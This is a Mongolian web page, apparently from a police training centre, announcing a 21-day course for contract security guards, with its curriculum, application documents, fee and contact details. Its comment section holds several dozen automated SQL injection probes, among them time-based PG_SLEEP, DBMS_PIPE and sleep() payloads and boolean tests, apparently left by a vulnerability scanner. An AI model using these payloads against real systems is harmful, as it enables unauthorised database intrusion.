• Нүүр хуудас
 • Холбоо барих
 • Асуулт хариулт
 • Иргэний хяналт

“Гэрээт харуул, хамгаалалтын ажилтан бэлтгэх сургалт”

2020-08-14

Цагдаагийн ерөнхий газрын даргын 2018 оны 08 дугаар сарын 22-ны өдрийн “Гэрээт харуул, хамгаалалтын сургалтын хөтөлбөр, төлөвлөгөө батлах тухай”  Б/586 дугаар тушаалаар Цагдаа, дотоодын цэргийн сургалтын нэгдсэн төв нь “Гэрээт харуул, хамгаалалтын ажилтан бэлтгэх сургалт”-ыг батлагдсан хөтөлбөр, төлөвлөгөөний дагуу 21 хоногийн хугацаатайгаар зохион байгуулахаар шийдвэрлэсэн.

Сургалт нь танхимын 14, дадлагажуулах 7 буюу нийт 21 хоногийн 120 цагийн сургалт явагдана. Үүнд:

 1. Хууль, эрх зүй, хүний эрхийн мэдлэг олгох, хамгаалалтын үүрэг гүйцэтгэх аргад сургах;
 2. Харилцааны соёл;
 3. Биеийн хүч хэрэглэх;
 4. Буудлага үйлдэх үеийн дадлага, сургуулилт;
 5. Холбооны хэрэгсэл ашиглах;
 6. Хамгаалах тусгай хэрэгсэл болон хөдөлмөрийн аюулгүй байдлын тусгай хувцас өмсөж хэрэглэх;
 7. Эмнэлгийн анхан шатны тусламж үзүүлэх;
 8. Аюулгүй байдлаа хангах, цагдаагийн байгууллагатай хамтран ажиллах гэх мэт

Сургалтад хамрагдах иргэдийн бүрдүүлэх материал: Үүнд:

 1. Анкет / 3*4 чээж зургийг анкет дээр наах/;
 2. Байгууллагын хүсэлт /Иргэдийг суралцуулах тухай/ ;
 3. Эрүүл мэндийн хуудас;
 4. Оршин суугаа газрын тодорхойлолт;
 5. Иргэний үнэмлэхийн хуулбар; /20 насанд хүрсэн байх/
 6.  Ял шийтгэлийн лавлагаа
 7.  Сургалтад хамрагдах иргэн, Хууль зүй, дотоод хэргийн сайд, Сангийн сайдын хамтарсан тушаалаар батлагдсан сургалтын төлбөр болох 199260 төгрөгийг Төрийн сангийн 100900012047 тоот дансанд /Данс эзэмшигчийн нэр "Сургалтын төв"/ тушаасан баримтыг эх хувиар хавсаргах зэрэг болно.

/Гэрээт харуул хамгаалалтын байгууллага, эсвэл суралцагч өөрөө төлбөрийг хариуцна./

      Сургалтад хамрагдсан иргэн дараах мэдлэг, ур чадварыг эзэмшинэ. Үүнд:

 • Гэрээт харуул, хамгаалалтын ажилтны чиг үүргийг хэрэгжүүлэх хууль тогтоомж, тэдгээрийг зөв хэрэглэх чадварыг;
 • Хүний эрх, эрх чөлөөний тухай үндсэн ойлголтуудыг судалж, ойлголттой болох, хууль тогтоомжийн хүрээнд албадлага хэрэглэх, хүний эрхийг хориглох, хязгаарлах үндэслэл, журмын талаар мэдлэгтэй, албадлагыг зөв хэрэглэх дадлага, чадварыг;
 • Нэг бүрийн тусгай хэрэгсэл, биеийн хүч, галт зэвсэг хэрэглэх хууль зүйн үндэслэл, журмын талаарх мэдлэг, хэрэглэх ур чадварыг;
 • Харилцааны тухайн нөхцөл байдлыг түргэн хугацаанд зөв үнэлж харилцааны арга, тактикийн сонголтыг хийх чадвар, гэрээт харуул хамгаалалтын ажилтны үүргийг гүйцэтгэх сэтгэл зүйн бэлтгэлтэй, зөв хандлагыг;
 • Цагдаагийн байгууллагатай хамтран ажиллах онол, арга зүйн зохих мэдлэг, түүнийгээ хэрэгжүүлэх чадварыг ;
 • Газар зүйн байдал, цаг агаарт дасан зохицох, тухайн нутаг дэвсгэрт амьдарч байгаа хүн амын зан заншлыг хүндэтгэж, хамтран ажиллах арга зүйг ;

Хаяг: Сонгинохайрхан дүүргийн 22 дугаар хороо, Дотоодын цэргийн 05 дугаар ангийн хашаанд байрлах Цагдаа, дотоодын цэргийн сургалтын нэгдсэн төв

Холбогдох утас: 95147102, 70190092, 86127102 /Тус төвийн жижүүрийн утас/

 

ncMUFCMU 1����%2527%2522
2021-01-20 Хариулах
ncMUFCMU @@BaVDu
2021-01-20 Хариулах
ncMUFCMU '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2021-01-20 Хариулах
ncMUFCMU 1'"
2021-01-20 Хариулах
ncMUFCMU *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
2021-01-20 Хариулах
ncMUFCMU K87ELlze')) OR 937=(SELECT 937 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU ZL0D7HQE') OR 726=(SELECT 726 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU STVgpv7E' OR 367=(SELECT 367 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU -1)) OR 707=(SELECT 707 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU -5) OR 960=(SELECT 960 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU -5 OR 48=(SELECT 48 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
2021-01-20 Хариулах
ncMUFCMU 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
2021-01-20 Хариулах
ncMUFCMU if(now()=sysdate(),sleep(15),0)
2021-01-20 Хариулах
ncMUFCMU -1 OR 3+851-851-1=0+0+0+1
2021-01-20 Хариулах
ncMUFCMU RLIKE (SELECT (CASE WHEN (978=978) THEN 1 ELSE 0x28 END)) --
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
ncMUFCMU -1 OR 2+851-851-1=0+0+0+1
2021-01-20 Хариулах
ncMUFCMU AeYA2v5A
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
1'"
2021-01-20 Хариулах
1����%2527%2522
2021-01-20 Хариулах
@@LqHRq
2021-01-20 Хариулах
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2021-01-20 Хариулах
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
2021-01-20 Хариулах
Ore5eh4I')) OR 732=(SELECT 732 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
0UlpgFgu') OR 92=(SELECT 92 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
nmH3uiDh' OR 615=(SELECT 615 FROM PG_SLEEP(15))--
2021-01-20 Хариулах